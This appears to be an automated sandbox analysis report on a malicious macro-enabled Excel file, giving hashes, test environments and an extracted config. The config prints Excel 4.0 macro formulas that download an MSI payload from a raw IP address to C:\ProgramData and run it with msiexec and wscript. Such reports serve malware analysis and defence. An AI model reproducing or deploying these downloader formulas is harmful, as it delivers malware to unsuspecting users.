Static task
static1
Behavioral task
behavioral1
Sample
a8832bcf05291992cb718e275893c2c3.xlsm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
a8832bcf05291992cb718e275893c2c3.xlsm
Resource
win10v2004-20240226-en
General
-
Target
a8832bcf05291992cb718e275893c2c3
-
Size
6KB
-
MD5
a8832bcf05291992cb718e275893c2c3
-
SHA1
437aba5e83d512abe90b42fc6c5939e5f03e826d
-
SHA256
8a4ec0aa92490c329f8f1fb29afbcffed684348329cdf704af21311c2a020499
-
SHA512
b5a4991c400aeda5c3d2b6cd5132dc450502e22ea2d1cc6ad4d4098366688a77bee79adc8427d18c3941e97d5999d160ccda10d78e397ded7c3628af6791be10
-
SSDEEP
192:NDSxuSd1aEOmmfRy8UhHFBFYucb98yBUfU:NKu4w01FYlb98yBAU
Malware Config
Extracted
http://46.17.98.187
-
formulas
=EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()
Signatures
Files
-
a8832bcf05291992cb718e275893c2c3.xlsm office2007